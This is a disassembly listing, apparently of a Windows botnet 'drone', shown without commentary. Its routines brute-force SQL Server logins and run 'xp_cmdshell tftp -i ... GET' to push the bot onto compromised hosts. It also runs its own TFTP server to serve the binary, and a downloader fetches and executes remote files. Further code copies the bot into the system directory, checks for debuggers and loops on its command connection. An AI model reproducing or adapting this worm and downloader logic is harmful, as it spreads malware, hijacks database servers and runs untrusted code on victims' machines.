add ebp, 0CD8h
leave
retn
; ---------------------------------------------------------------------------
loc_41B23A: ; CODE XREF: sub_41B1A0+7E�j
push 0FFFFFFFAh
push 3
push 0C8h
push [ebp+0CD8h+var_D34]
call sub_402624
test ax, ax
jnz short loc_41B220
lea eax, [ebp+0CD8h+var_D2C]
push eax
push [ebp+0CD8h+var_D34]
push 2
call sub_402630
test ax, ax
jz short loc_41B271
loc_41B263: ; CODE XREF: sub_41B1A0+22B�j
push [ebp+0CD8h+var_D34]
push 1
call sub_402636
mov al, bl
jmp short loc_41B222
; ---------------------------------------------------------------------------
loc_41B271: ; CODE XREF: sub_41B1A0+C1�j
mov edi, ds:dword_41D260
lea ecx, [ebp+0CD8h+var_D54]
mov [ebp+0CD8h+var_D3C], ecx
loc_41B27D: ; CODE XREF: sub_41B1A0+1D0�j
cmp off_424650, ebx
mov [ebp+0CD8h+var_D38], ebx
jz loc_41B365
mov esi, [ecx]
mov eax, offset off_424650
loc_41B293: ; CODE XREF: sub_41B1A0+16B�j
lea ecx, [ebp+0CD8h+var_D26]
push ecx
push dword ptr [eax]
push esi
push [ebp+0CD8h+var_C1C]
push [ebp+0CD8h+var_D40]
call edi ; inet_ntoa
push eax
lea eax, [ebp+0CD8h+Dest]
push offset aDriverSqlServe ; "DRIVER={SQL Server};SERVER=%s,%d;UID=%s"...
push eax ; Dest
call _sprintf
lea eax, [ebp+0CD8h+Dest]
add esp, 1Ch
lea ecx, [eax+1]
loc_41B2C3: ; CODE XREF: sub_41B1A0+128�j
mov dl, [eax]
inc eax
cmp dl, bl
jnz short loc_41B2C3
push ebx
sub eax, ecx
lea ecx, [ebp+0CD8h+var_D44]
push ecx
push 400h
lea ecx, [ebp+0CD8h+var_C14]
push ecx
push eax
lea eax, [ebp+0CD8h+Dest]
push eax
push ebx
push [ebp+0CD8h+var_D2C]
call sub_40262A
movzx eax, ax
cmp ax, bx
jz short loc_41B30F
cmp ax, 1
jz short loc_41B30F
inc [ebp+0CD8h+var_D38]
mov eax, [ebp+0CD8h+var_D38]
lea eax, ds:424650h[eax*4]
cmp [eax], ebx
jnz short loc_41B293
jmp short loc_41B365
; ---------------------------------------------------------------------------
loc_41B30F: ; CODE XREF: sub_41B1A0+154�j
; sub_41B1A0+15A�j
lea eax, [ebp+0CD8h+var_D30]
push eax
push [ebp+0CD8h+var_D2C]
push 3
call sub_402630
push dword_4269BC
lea esi, [ebp+0CD8h+var_14]
call sub_418FC6
mov eax, esi
push eax
lea eax, [ebp+0CD8h+var_814]
push offset aExecMaster__xp ; "EXEC master..xp_cmdshell 'tftp -i %s GE"...
push eax ; Dest
call _sprintf
add esp, 10h
push 0FFFFFFFDh
lea eax, [ebp+0CD8h+var_814]
push eax
push [ebp+0CD8h+var_D30]
call sub_40263C
test ax, ax
jz short loc_41B378
push [ebp+0CD8h+var_D30]
push 3
call sub_402636
loc_41B365: ; CODE XREF: sub_41B1A0+E6�j
; sub_41B1A0+16D�j
mov ecx, [ebp+0CD8h+var_D3C]
add ecx, 4
cmp [ecx], ebx
mov [ebp+0CD8h+var_D3C], ecx
jnz loc_41B27D
jmp short loc_41B3BE
; ---------------------------------------------------------------------------
loc_41B378: ; CODE XREF: sub_41B1A0+1B9�j
push [ebp+0CD8h+var_D40]
mov [ebp+0CD8h+var_D25], 1
call edi ; inet_ntoa
push eax
mov eax, [ebp+0CD8h+var_C24]
imul eax, 2Ch
add eax, offset dword_424528
push eax ; Args
push offset aSExploitedS__0 ; "%s: Exploited %s."
lea eax, [ebp+0CD8h+var_D24]
push eax ; int
push dword ptr [ebp+0CD8h+var_C18] ; char
push offset dword_4269BC ; int
call sub_417361
mov eax, [ebp+0CD8h+var_C24]
imul eax, 2Ch
lea eax, dword_42454C[eax]
add esp, 18h
inc dword ptr [eax]
loc_41B3BE: ; CODE XREF: sub_41B1A0+1D6�j
push [ebp+0CD8h+var_D2C]
push 2
call sub_402636
mov bl, [ebp+0CD8h+var_D25]
jmp loc_41B263
sub_41B1A0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B3D0 proc near ; DATA XREF: sub_41B5D2+15A�o
var_23C = dword ptr -23Ch
var_238 = dword ptr -238h
var_230 = dword ptr -230h
var_22C = dword ptr -22Ch
File = dword ptr -228h
var_224 = word ptr -224h
var_222 = word ptr -222h
DstBuf = byte ptr -220h
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 240h
mov eax, dword_423064
xor eax, ebp
mov [ebp+var_8], eax
push ebx
push esi
mov esi, [ebp+arg_0]
xor ebx, ebx
cmp esi, ebx
push edi
jnz short loc_41B3F6
loc_41B3EF: ; CODE XREF: sub_41B3D0+42�j
; sub_41B3D0+5D�j ...
push ebx
call ds:dword_41D08C ; ExitThread
loc_41B3F6: ; CODE XREF: sub_41B3D0+1D�j
lea edi, [ebp+var_18]
movsd
movsd
push 11h
movsd
push 2
push 2
movsd
call ds:dword_41D27C ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+var_230], eax
jz short loc_41B3EF
push offset aRb ; "rb"
push offset Filename ; Filename
call _fopen
cmp eax, ebx
pop ecx
pop ecx
mov [ebp+File], eax
jz short loc_41B3EF
push eax ; File
mov [ebp+var_22C], ebx
mov [ebp+var_23C], 10h
call _feof
test eax, eax
pop ecx
jnz loc_41B53E
mov esi, ds:dword_41D278
loc_41B454: ; CODE XREF: sub_41B3D0+168�j
push 204h ; size_t
lea eax, [ebp+var_224]
push ebx ; int
push eax ; void *
call _memset
add esp, 0Ch
xor eax, eax
inc [ebp+var_22C]
push [ebp+var_22C]
lea edi, [ebp+var_238]
stosd
call esi ; htons
push 3
mov [ebp+var_222], ax
call esi ; htons
push [ebp+File] ; File
mov [ebp+var_224], ax
push 200h ; Count
lea eax, [ebp+DstBuf]
push 1 ; ElementSize
push eax ; DstBuf
call _fread
mov edi, [ebp+var_230]
add esp, 10h
push 10h
lea ecx, [ebp+var_18]
push ecx
push ebx
add eax, 4
push eax
lea eax, [ebp+var_224]
push eax
push edi
call ds:dword_41D24C ; sendto
cmp eax, 0FFFFFFFFh
jz loc_41B5BA
lea eax, [ebp+var_23C]
push eax
lea eax, [ebp+var_18]
push eax
push ebx
push 4
lea eax, [ebp+var_238]
push eax
push edi
call ds:dword_41D25C ; recvfrom
cmp eax, 0FFFFFFFFh
jz loc_41B5BA
push [ebp+var_238]
call ds:dword_41D254 ; htons
cmp ax, 4
jnz loc_41B5BA
push [ebp+var_238+2]
call ds:dword_41D254 ; htons
cmp ax, word ptr [ebp+var_22C]
jnz loc_41B5BA
push [ebp+File] ; File
call _feof
test eax, eax
pop ecx
jz loc_41B454
loc_41B53E: ; CODE XREF: sub_41B3D0+78�j
inc dword_43394C
push 100h ; unsigned int
call j_??2@YAPAXI@Z ; operator new(uint)
mov esi, eax
push esi ; void *
call __msize
push eax
mov ebx, offset dword_424ED0
call sub_4196D1
add esp, 0Ch
push dword_43394C
push [ebp+var_14]
call ds:dword_41D260 ; inet_ntoa
push eax ; Args
push offset aTftpSendComple ; "TFTP: Send Complete To %s. %d Total Sen"...
push esi ; int
push 0 ; char
push offset dword_4269BC ; int
call sub_417361
push esi ; Memory
call j_j__free
add esp, 1Ch
push [ebp+var_230]
call ds:dword_41D224 ; closesocket
push [ebp+File] ; File
call _fclose
pop ecx
mov ecx, [ebp+var_8]
pop edi
pop esi
xor ecx, ebp
xor eax, eax
pop ebx
call sub_402710
leave
retn 4
; ---------------------------------------------------------------------------
loc_41B5BA: ; CODE XREF: sub_41B3D0+100�j
; sub_41B3D0+125�j ...
push edi
call ds:dword_41D224 ; closesocket
push [ebp+File] ; File
call _fclose
pop ecx
jmp loc_41B3EF
sub_41B3D0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B5D2 proc near ; DATA XREF: sub_41B775+53�o
var_148 = dword ptr -148h
var_144 = dword ptr -144h
var_140 = dword ptr -140h
var_13C = dword ptr -13Ch
var_138 = byte ptr -138h
var_134 = dword ptr -134h
var_120 = dword ptr -120h
var_11C = dword ptr -11Ch
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_4 = dword ptr -4
push ebp
mov ebp, esp
and esp, 0FFFFFFF8h
sub esp, 14Ch
mov eax, dword_423064
xor eax, esp
mov [esp+14Ch+var_4], eax
push ebx
push esi
push edi
push 11h
xor esi, esi
push 2
inc esi
push 2
mov [esp+164h+var_140], esi
call ds:dword_41D27C ; socket
cmp eax, 0FFFFFFFFh
mov dword_4269E4, eax
jnz short loc_41B61B
xor ebx, ebx
loc_41B60E: ; CODE XREF: sub_41B5D2+C1�j
mov byte_433945, bl
loc_41B614: ; CODE XREF: sub_41B5D2+BF�j
push ebx
call ds:dword_41D08C ; ExitThread
loc_41B61B: ; CODE XREF: sub_41B5D2+38�j
push 4
lea ecx, [esp+15Ch+var_140]
push ecx
push 4
push 0FFFFh
push eax
call ds:dword_41D250 ; setsockopt
xor eax, eax
lea edi, [esp+158h+var_14]
stosd
stosd
stosd
stosd
push 45h
mov [esp+15Ch+var_14], 2
call ds:dword_41D278 ; htons
mov [esp+158h+var_12], ax
push 10h
lea eax, [esp+15Ch+var_14]
push eax
push dword_4269E4
xor ebx, ebx
mov [esp+164h+var_10], ebx
call ds:dword_41D26C ; bind
cmp eax, 0FFFFFFFFh
jnz loc_41B744
push dword_4269E4
call ds:dword_41D224 ; closesocket
cmp byte_433945, bl
jz short loc_41B614
jmp loc_41B60E
; ---------------------------------------------------------------------------
loc_41B698: ; CODE XREF: sub_41B5D2+178�j
mov eax, dword_4269E4
mov [esp+158h+var_11C], eax
xor eax, eax
lea edi, [esp+158h+var_148]
stosd
stosd
lea eax, [esp+158h+var_148]
push eax
push ebx
push ebx
lea eax, [esp+164h+var_120]
push eax
push ebx
mov [esp+16Ch+var_120], esi
mov [esp+16Ch+var_148], 5
mov [esp+16Ch+var_144], ebx
call ds:dword_41D258 ; select
test eax, eax
jle short loc_41B744
xor eax, eax
lea edi, [esp+158h+var_134]
stosd
stosd
stosd
stosd
stosd
lea eax, [esp+158h+var_13C]
push eax
lea eax, [esp+15Ch+var_14]
push eax
push ebx
push 14h
lea eax, [esp+168h+var_134]
push eax
push dword_4269E4
mov [esp+170h+var_13C], 10h
call ds:dword_41D25C ; recvfrom
cmp eax, 0FFFFFFFFh
jz short loc_41B744
push [esp+158h+var_134]
inc dword_433948
call ds:dword_41D254 ; htons
cmp ax, si
jnz short loc_41B744
lea eax, [esp+158h+var_138]
push eax
push ebx
lea eax, [esp+160h+var_14]
push eax
push offset sub_41B3D0
push ebx
push ebx
call ds:dword_41D110 ; CreateThread
push 3E8h
call ds:dword_41D0FC ; Sleep
loc_41B744: ; CODE XREF: sub_41B5D2+A7�j
; sub_41B5D2+FC�j ...
cmp byte_433945, bl
jnz loc_41B698
push dword_4269E4
call ds:dword_41D224 ; closesocket
mov ecx, [esp+158h+var_4]
pop edi
pop esi
pop ebx
xor ecx, esp
xor eax, eax
call sub_402710
mov esp, ebp
pop ebp
retn 4
sub_41B5D2 endp
; =============== S U B R O U T I N E =======================================
sub_41B775 proc near ; CODE XREF: sub_401F1C+5A�p
; .text:0041BFB5�p
push 4
mov eax, offset __ehhandler$?empty@locale@std@@SA?AV12@XZ
call __EH_prolog3
xor ebx, ebx
cmp byte_433945, bl
jz short loc_41B78F
loc_41B78B: ; CODE XREF: sub_41B775+74�j
mov al, 1
jmp short loc_41B7F3
; ---------------------------------------------------------------------------
loc_41B78F: ; CODE XREF: sub_41B775+14�j
mov edi, 100h
push edi ; size_t
push ebx ; int
mov esi, offset Filename
push esi ; void *
call _memset
add esp, 0Ch
push edi
push esi
push ebx
call ds:dword_41D0E4 ; GetModuleHandleA
push eax
call ds:dword_41D060 ; GetModuleFileNameA
push 8 ; Size
call ??2@YAPAXI@Z ; operator new(uint)
mov esi, eax
pop ecx
mov [ebp-10h], esi
cmp esi, ebx
mov [ebp-4], ebx
jz short loc_41B7DB
push offset sub_41B5D2
xor ecx, ecx
mov edi, offset aTftpServer ; "TFTP Server"
call sub_4140AB
jmp short loc_41B7DD
; ---------------------------------------------------------------------------
loc_41B7DB: ; CODE XREF: sub_41B775+51�j
xor eax, eax
loc_41B7DD: ; CODE XREF: sub_41B775+64�j
cmp [eax+4], ebx
jz short loc_41B7EB
mov byte_433945, 1
jmp short loc_41B78B
; ---------------------------------------------------------------------------
loc_41B7EB: ; CODE XREF: sub_41B775+6B�j
mov byte_433945, bl
xor al, al
loc_41B7F3: ; CODE XREF: sub_41B775+18�j
call __EH_epilog3
retn
sub_41B775 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B7F9 proc near ; CODE XREF: sub_40177B+6C�p
; sub_4019F3+6C�p ...
var_3DC = dword ptr -3DCh
var_3D8 = byte ptr -3D8h
var_308 = byte ptr -308h
var_307 = byte ptr -307h
Dest = byte ptr -208h
var_207 = byte ptr -207h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
and esp, 0FFFFFFF8h
sub esp, 3E0h
mov eax, dword_423064
xor eax, esp
mov [esp+3E0h+var_4], eax
mov eax, [ebp+arg_0]
push ebx
push esi
mov esi, 1FFh
xor ebx, ebx
push esi ; size_t
mov [esp+3ECh+var_3DC], eax
lea eax, [esp+3ECh+var_207]
push ebx ; int
push eax ; void *
mov [esp+3F4h+Dest], bl
call _memset
add esp, 0Ch
push 0FFh ; size_t
lea eax, [esp+3ECh+var_307]
push ebx ; int
push eax ; void *
mov [esp+3F4h+var_308], bl
call _memset
add esp, 0Ch
lea eax, [esp+3E8h+var_3D8]
call sub_4143A0
push [esp+3E8h+var_3DC]
lea eax, [esp+3ECh+Dest]
push offset aS_16 ; "%s"
push esi ; Count
push eax ; Dest
call __snprintf
lea eax, [esp+3F8h+Dest]
add esp, 10h
lea esi, [eax+1]
loc_41B886: ; CODE XREF: sub_41B7F9+92�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_41B886
lea ecx, [esp+3E8h+var_3D8]
push ecx
sub eax, esi
push eax
lea ecx, [esp+3F0h+Dest]
call sub_416C60
push 200h ; size_t
lea eax, [esp+3F4h+Dest]
push ebx ; int
push eax ; void *
call _memset
lea eax, [esp+3FCh+var_308]
add esp, 14h
push eax
lea ebx, [esp+3ECh+var_3D8]
call sub_416AE0
pop ecx
push 0C0h ; size_t
push 0 ; int
push edi ; void *
call _memset
add esp, 0Ch
xor esi, esi
loc_41B8DB: ; CODE XREF: sub_41B7F9+114�j
movzx eax, [esp+esi+3E8h+var_308]
push eax
push edi
push offset aSX ; "%s%X"
push 0BFh ; Count
push edi ; Dest
call __snprintf
mov eax, edi
add esp, 14h
lea ecx, [eax+1]
loc_41B8FD: ; CODE XREF: sub_41B7F9+109�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_41B8FD
sub eax, ecx
inc esi
cmp esi, 40h
mov [eax+edi], dl
jl short loc_41B8DB
mov ecx, [esp+3E8h+var_4]
pop esi
pop ebx
xor ecx, esp
mov eax, edi
call sub_402710
mov esp, ebp
pop ebp
retn
sub_41B7F9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B925 proc near ; DATA XREF: sub_40177B+234�o
; sub_4019F3+1E6�o
var_750 = dword ptr -750h
var_74C = dword ptr -74Ch
var_748 = dword ptr -748h
var_744 = dword ptr -744h
var_740 = dword ptr -740h
var_73C = byte ptr -73Ch
var_738 = dword ptr -738h
var_638 = byte ptr -638h
Args = byte ptr -615h
Format = byte ptr -515h
var_415 = byte ptr -415h
var_414 = byte ptr -414h
var_413 = byte ptr -413h
var_408 = byte ptr -408h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
and esp, 0FFFFFFF8h
sub esp, 754h
mov eax, dword_423064
xor eax, esp
mov [esp+754h+var_4], eax
push ebx
push esi
mov esi, [ebp+arg_0]
push edi
mov ecx, 0C9h
lea edi, [esp+760h+var_738]
rep movsd
xor ebx, ebx
push ebx
push ebx
push ebx
movsw
push ebx
push offset aMozilla5_0 ; "Mozilla/5.0"
movsb
call ds:dword_41D21C ; InternetOpenA
mov esi, eax
lea eax, [esp+760h+Format]
push eax
lea eax, [esp+764h+Args]
push eax ; Args
push offset aDlDownloadingS ; "DL: Downloading %s to %s"
lea eax, [esp+76Ch+var_738]
push eax ; int
push dword ptr [esp+770h+var_413] ; char
mov edi, offset dword_4269BC
push edi ; int
call sub_417361
add esp, 18h
push ebx
push ebx
push ebx
push ebx
lea eax, [esp+770h+Args]
push eax
push esi
call ds:dword_41D218 ; InternetOpenUrlA
cmp esi, ebx
mov [esp+760h+var_744], eax
jz loc_41BB44
cmp eax, ebx
jz loc_41BB3D
push ebx
push ebx
push 2
push ebx
push ebx
push 40000000h
lea eax, [esp+778h+Format]
push eax
call ds:dword_41D06C ; CreateFileA
mov [esp+760h+var_748], eax
call ds:dword_41D108 ; GetTickCount
mov [esp+760h+var_740], eax
mov [esp+760h+var_750], ebx
mov esi, 400h
loc_41B9EC: ; CODE XREF: sub_41B925+11F�j
push esi ; size_t
lea eax, [esp+764h+var_408]
push ebx ; int
push eax ; void *
call _memset
add esp, 0Ch
lea eax, [esp+760h+var_74C]
push eax
push esi
lea eax, [esp+768h+var_408]
push eax
push [esp+76Ch+var_744]
call ds:dword_41D214 ; InternetReadFile
push ebx
lea eax, [esp+764h+var_73C]
push eax
push [esp+768h+var_74C]
lea eax, [esp+76Ch+var_408]
push eax
push [esp+770h+var_748]
call ds:dword_41D088 ; WriteFile
test eax, eax
jz loc_41BAEF
mov eax, [esp+760h+var_74C]
add [esp+760h+var_750], eax
cmp eax, ebx
ja short loc_41B9EC
call ds:dword_41D108 ; GetTickCount
sub eax, [esp+760h+var_740]
xor edx, edx
mov ecx, 3E8h
div ecx
mov ecx, eax
cmp ecx, ebx
jnz short loc_41BA62
xor ecx, ecx
inc ecx
loc_41BA62: ; CODE XREF: sub_41B925+138�j
mov eax, [esp+760h+var_750]
xor edx, edx
div ecx
shr eax, 0Ah
push eax
push ecx
push [esp+768h+var_750]
lea eax, [esp+76Ch+Format]
push eax ; Args
push offset aDlDownloadSIBy ; "DL: Download %s (%i Bytes) finished in "...
lea eax, [esp+774h+var_738]
push eax ; int
push dword ptr [esp+778h+var_413] ; char
push edi ; int
call sub_417361
add esp, 20h
push [esp+760h+var_748]
call ds:dword_41D0DC ; CloseHandle
cmp [esp+760h+var_415], 1
jnz loc_41BB5E
cmp [esp+760h+var_414], bl
lea eax, [esp+760h+Format]
jz short loc_41BAFD
push eax ; Format
call sub_419219
test al, al
pop ecx
lea eax, [esp+760h+var_738]
jz short loc_41BAF6
push offset aMainUninstalli ; "Main: Uninstalling Drone"
push eax ; int
push dword ptr [esp+768h+var_413] ; char
push edi ; int
call sub_417361
add esp, 10h
lea eax, [esp+760h+var_638]
push eax
call sub_419477 ; IsDebuggerPresent
loc_41BAEF: ; CODE XREF: sub_41B925+10F�j
push offset aDlFailedBadLoc ; "DL: Failed; Bad Location."
jmp short loc_41BB49
; ---------------------------------------------------------------------------
loc_41BAF6: ; CODE XREF: sub_41B925+1A5�j
push offset aDlFailedToUpda ; "DL: Failed To Update"
jmp short loc_41BB4D
; ---------------------------------------------------------------------------
loc_41BAFD: ; CODE XREF: sub_41B925+196�j
push 5
push ebx
push ebx
push eax
push offset byte_41EF0F
push ebx
call ds:dword_41D1E4
test eax, eax
jnz short loc_41BB19
push offset aDlErrorExecuti ; "DL: Error Executing File."
jmp short loc_41BB49
; ---------------------------------------------------------------------------
loc_41BB19: ; CODE XREF: sub_41B925+1EB�j
lea eax, [esp+760h+Format]
push eax ; Args
push offset aDlExecutedFile ; "DL: Executed File: %s"
lea eax, [esp+768h+var_738]
push eax ; int
push dword ptr [esp+76Ch+var_413] ; char
push edi ; int
call sub_417361
add esp, 14h
jmp short loc_41BB5E
; ---------------------------------------------------------------------------
loc_41BB3D: ; CODE XREF: sub_41B925+91�j
push offset aDlFailedBadUrl ; "DL: Failed; Bad URL"
jmp short loc_41BB49
; ---------------------------------------------------------------------------
loc_41BB44: ; CODE XREF: sub_41B925+89�j
push offset aDlFailedWinine ; "DL: Failed; WinINET Error"
loc_41BB49: ; CODE XREF: sub_41B925+1CF�j
; sub_41B925+1F2�j ...
lea eax, [esp+764h+var_738]
loc_41BB4D: ; CODE XREF: sub_41B925+1D6�j
push eax ; int
push dword ptr [esp+768h+var_413] ; char
push edi ; int
call sub_417361
add esp, 10h
loc_41BB5E: ; CODE XREF: sub_41B925+182�j
; sub_41B925+216�j
call ds:dword_41D0E0 ; GetCurrentThreadId
push eax
call sub_414042
pop ecx
mov ecx, [esp+760h+var_4]
pop edi
pop esi
pop ebx
xor ecx, esp
xor eax, eax
call sub_402710
mov esp, ebp
pop ebp
retn 4
sub_41B925 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall sub_41BB84(char *Format)
sub_41BB84 proc near ; CODE XREF: sub_41C370+45�p
; sub_41C370+61�p ...
var_108 = dword ptr -108h
Dest = byte ptr -104h
var_4 = dword ptr -4
Format = dword ptr 8
push ebp
mov ebp, esp
sub esp, 108h
mov eax, dword_423064
xor eax, ebp
mov [ebp+var_4], eax
mov eax, [ebp+Format]
push eax ; Format
lea eax, [ebp+Dest]
push 100h ; Count
push eax ; Dest
mov dword ptr [esi], offset off_420A74
mov [ebp+var_108], esi
call __snprintf
mov eax, dword_433C40
add esp, 0Ch
lea edx, [ebp+var_108]
push edx
mov ecx, offset dword_433C3C
push eax
push ecx
call sub_40121E
mov ecx, [ebp+var_4]
xor ecx, ebp
mov eax, esi
call sub_402710
leave
retn 4
sub_41BB84 endp
; ---------------------------------------------------------------------------
; int __stdcall WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCmdLine,int nShowCmd)
_WinMain@16: ; CODE XREF: ___tmainCRTStartup+172�p
push ebp
mov ebp, esp
and esp, 0FFFFFFF8h
sub esp, 724h
mov eax, dword_423064
xor eax, esp
mov [esp+720h], eax
mov eax, [ebp+10h]
push ebx
push esi
push edi
mov [esp+10h], eax
call sub_419677
test al, al
jz short loc_41BC29
loc_41BC10: ; CODE XREF: .text:0041BDA1�j
; .text:0041BDCC�j ...
mov ecx, [esp+72Ch]
pop edi
pop esi
pop ebx
xor ecx, esp
xor eax, eax
call sub_402710
mov esp, ebp
pop ebp
retn 10h
; ---------------------------------------------------------------------------
loc_41BC29: ; CODE XREF: .text:0041BC0E�j
call sub_4195EC
test al, al
jnz loc_41C061
call ds:dword_41D090 ; IsDebuggerPresent
test eax, eax
jnz loc_41C061
mov esi, offset aIrn ; "--irn "
lea edi, [esp+248h]
movsd
movsw
movsb
mov edi, 103h
xor ebx, ebx
push edi
lea eax, [esp+625h]
push ebx
push eax
mov [esp+62Ch], bl
call _memset
add esp, 0Ch
push edi
lea eax, [esp+415h]
push ebx
push eax
mov [esp+41Ch], bl
call _memset
add esp, 0Ch
push edi
lea eax, [esp+30Dh]
push ebx
push eax
mov [esp+314h], bl
call _memset
add esp, 0Ch
push 7Fh
lea eax, [esp+28Dh]
push ebx
push eax
mov [esp+294h], bl
call _memset
add esp, 0Ch
push edi
lea eax, [esp+624h]
push eax
call ds:dword_41D0F4 ; GetSystemDirectoryA
push 80h
lea esi, [esp+28Ch]
mov ebx, offset byte_425061
call sub_4196D1
pop ecx
mov eax, esi
push eax
lea eax, [esp+624h]
push eax
push offset aSS ; "%s\\%s"
lea eax, [esp+314h]
push edi
push eax
call __snprintf
lea eax, [esp+31Ch]
add esp, 14h
lea ecx, [eax+1]
loc_41BD11: ; CODE XREF: .text:0041BD16�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_41BD11
sub eax, ecx
xor ebx, ebx
mov [esp+eax+308h], bl
mov esi, 104h
push esi
lea eax, [esp+414h]
push eax
push ebx
call ds:dword_41D0E4 ; GetModuleHandleA
push eax
call ds:dword_41D060 ; GetModuleFileNameA
lea eax, [esp+248h]
lea ecx, [eax+1]
loc_41BD49: ; CODE XREF: .text:0041BD4E�j
mov dl, [eax]
inc eax
cmp dl, bl
jnz short loc_41BD49
sub eax, ecx
push eax
lea eax, [esp+24Ch]
push eax
push dword ptr [esp+18h]
call __strnicmp
add esp, 0Ch
test eax, eax
jz short loc_41BDD1
push esi
lea eax, [esp+30Ch]
push eax
lea eax, [esp+418h]
push eax
call __strnicmp
add esp, 0Ch
test eax, eax
jz short loc_41BDD1
push ebx
lea eax, [esp+30Ch]
push eax
lea eax, [esp+418h]
push eax
call ds:dword_41D080 ; CopyFileA
test eax, eax
jz loc_41BC10
lea eax, [esp+410h]
push eax
lea eax, [esp+24Ch]
push eax
lea eax, [esp+310h]
push eax
push offset aSSS ; "%s %s%s"
call sub_419219
add esp, 10h
jmp loc_41BC10
; ---------------------------------------------------------------------------
loc_41BDD1: ; CODE XREF: .text:0041BD69�j
; .text:0041BD86�j
lea eax, [esp+248h]
lea edx, [eax+1]
loc_41BDDB: ; CODE XREF: .text:0041BDE0�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_41BDDB
sub eax, edx
push eax
lea eax, [esp+24Ch]
push eax
push dword ptr [esp+18h]
call __strnicmp
add esp, 0Ch
test eax, eax
jnz loc_41BE8C
push esi
lea eax, [esp+30Ch]
push eax
lea eax, [esp+418h]
push eax
call __strnicmp
add esp, 0Ch
test eax, eax
jnz short loc_41BE8C
push edi
lea eax, [esp+51Dh]
push ebx
push eax
mov [esp+524h], bl
call _memset
lea eax, [esp+254h]
add esp, 0Ch
lea edi, [eax+1]
loc_41BE41: ; CODE XREF: .text:0041BE46�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_41BE41
mov ecx, [esp+10h]
sub eax, edi
add eax, ecx
push eax
push offset aS ; "%s"
lea eax, [esp+520h]
push esi
push eax
call __snprintf
add esp, 10h
xor esi, esi
loc_41BE69: ; CODE XREF: .text:0041BE8A�j
lea eax, [esp+518h]
push eax
call ds:dword_41D0D0 ; DeleteFileA
test eax, eax
jnz short loc_41BE8C
push 0C8h
call ds:dword_41D0FC ; Sleep
inc esi
cmp esi, 3
jb short loc_41BE69
loc_41BE8C: ; CODE XREF: .text:0041BDFB�j
; .text:0041BE1C�j ...
push 80h
lea eax, [esp+28Ch]
push ebx
push eax
call _memset
add esp, 0Ch
push 37h
lea eax, [esp+255h]
push ebx
push eax
mov [esp+25Ch], bl
call _memset
add esp, 0Ch
push 38h
lea esi, [esp+254h]
mov ebx, offset byte_4250E1
call sub_4196D1
pop ecx
mov eax, esi
push eax
push 1
xor ebx, ebx
push ebx
call ds:dword_41D084 ; CreateMutexA
push 38h
mov esi, eax
lea eax, [esp+254h]
push ebx
push eax
call _memset
add esp, 0Ch
push 1388h
push esi
call ds:dword_41D07C ; WaitForSingleObject
cmp eax, 102h
jnz short loc_41BF0D
push ebx
call ds:dword_41D050 ; ExitProcess
loc_41BF0D: ; CODE XREF: .text:0041BF04�j
call sub_416F86
push 8
call ??2@YAPAXI@Z ; operator new(uint)
cmp eax, ebx
pop ecx
jz short loc_41BF31
push offset sub_417119
xor ecx, ecx
mov edi, offset aRm ; "RM"
mov esi, eax
call sub_4140AB
loc_41BF31: ; CODE XREF: .text:0041BF1C�j
lea eax, [esp+20h]
push eax
mov dword ptr [esp+24h], 94h
call ds:dword_41D068 ; GetVersionExA
cmp dword ptr [esp+24h], 4
jz short loc_41BF6A
push 8
call ??2@YAPAXI@Z ; operator new(uint)
cmp eax, ebx
pop ecx
jz short loc_41BF6A
push offset sub_419EA0
xor ecx, ecx
mov edi, offset aBk ; "BK"
mov esi, eax
call sub_4140AB
loc_41BF6A: ; CODE XREF: .text:0041BF49�j
; .text:0041BF55�j
push 8
mov byte_4269C0, bl
call ??2@YAPAXI@Z ; operator new(uint)
cmp eax, ebx
pop ecx
jz short loc_41BF8F
push offset sub_418301
xor ecx, ecx
mov edi, offset aUnm ; "UNM"
mov esi, eax
call sub_4140AB
loc_41BF8F: ; CODE XREF: .text:0041BF7A�j
lea eax, [esp+0B8h]
push eax
push 202h
call ds:dword_41D274 ; WSAStartup
test eax, eax
jnz loc_41C056
call sub_4192FB
mov byte_433945, bl
call sub_41B775
mov eax, [ebp+8]
mov byte_4268B4, bl
mov dword_4266A4, eax
call sub_418D17
mov eax, dword_433C40
mov eax, [eax]
mov ebx, offset dword_433C3C
mov [esp+14h], eax
mov [esp+10h], ebx
loc_41BFE1: ; CODE XREF: .text:0041C00C�j
cmp dword ptr [esp+10h], 0
mov esi, dword_433C40
jz short loc_41BFF4
cmp [esp+10h], ebx
jz short loc_41BFF9
loc_41BFF4: ; CODE XREF: .text:0041BFEC�j
call __invalid_parameter_noinfo
loc_41BFF9: ; CODE XREF: .text:0041BFF2�j
cmp [esp+14h], esi
jz short loc_41C00E
lea edi, [esp+18h]
lea esi, [esp+10h]
call sub_40168C
jmp short loc_41BFE1
; ---------------------------------------------------------------------------
loc_41C00E: ; CODE XREF: .text:0041BFFD�j
mov esi, offset dword_4269BC
loc_41C013: ; CODE XREF: .text:0041C054�j
movsx eax, word_424E48
push eax
push offset dword_424C48
mov edx, offset dword_424A48
mov ecx, esi
call sub_41802F
test al, al
jz short loc_41C042
mov byte_4269C0, 1
loc_41C037: ; CODE XREF: .text:0041C040�j
mov ecx, esi
call sub_417F01
test al, al
jnz short loc_41C037
loc_41C042: ; CODE XREF: .text:0041C02E�j
push 3A98h
mov byte_4269C0, 0
call ds:dword_41D0FC ; Sleep
jmp short loc_41C013
; ---------------------------------------------------------------------------
loc_41C056: ; CODE XREF: .text:0041BFA4�j
